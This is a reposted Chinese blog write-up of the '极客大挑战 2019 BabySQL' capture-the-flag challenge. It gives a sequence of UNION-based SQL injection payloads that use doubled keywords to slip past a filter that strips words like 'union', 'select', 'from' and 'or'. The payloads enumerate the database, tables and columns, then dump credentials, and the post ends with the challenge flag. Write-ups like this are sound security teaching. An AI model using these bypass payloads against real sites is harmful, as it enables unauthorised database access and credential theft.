首页 > 数据库技术 > 详细

[极客大挑战 2019]BabySQL

时间:2020-07-14 20:00:29      阅读:80      评论:0      收藏:0      [点我收藏+]

[极客大挑战 2019]BabySQL

技术分享图片
测试单引号
技术分享图片

存在注入
开始按步骤操作,先猜有多少个字段
技术分享图片

order by变成了der,说明是直接删掉了,可以双写绕过
Payload:?username=1 &password=2‘ oorrder bbyy 3%23
技术分享图片
技术分享图片

还是三个,开始查询数据库,先看一下union和select 有没有被删除,在union和select 前后加了字符
技术分享图片

说明被删除了,依然双写绕过
Payload:?username=1 &password=2‘ uniunionon seselectlect null,null,database()%23
技术分享图片

继续查表,要注意需要双写的字符
技术分享图片

发现from,where也被删除
payload:?username=1 &password=2‘ ununionion seselectlect null,null,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=‘geek‘)%23
技术分享图片

继续查询列
Payload:?username=1 &password=2‘ uniounionn selselectect null,null,( seselectlect group_concat( column_name ) frfromom infoorrmation_schema.columns whewherere table_name=‘b4bsql‘)%23
技术分享图片

查询数据
Payload:?username=1 &password=2‘ uniounionn seleselectct null,null,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm geek.b4bsql%23
技术分享图片

得到flag
flag{950bfb49-92c6-4b78-b525-9622b09f156f}

[极客大挑战 2019]BabySQL

原文:https://www.cnblogs.com/yunqian2017/p/13300906.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!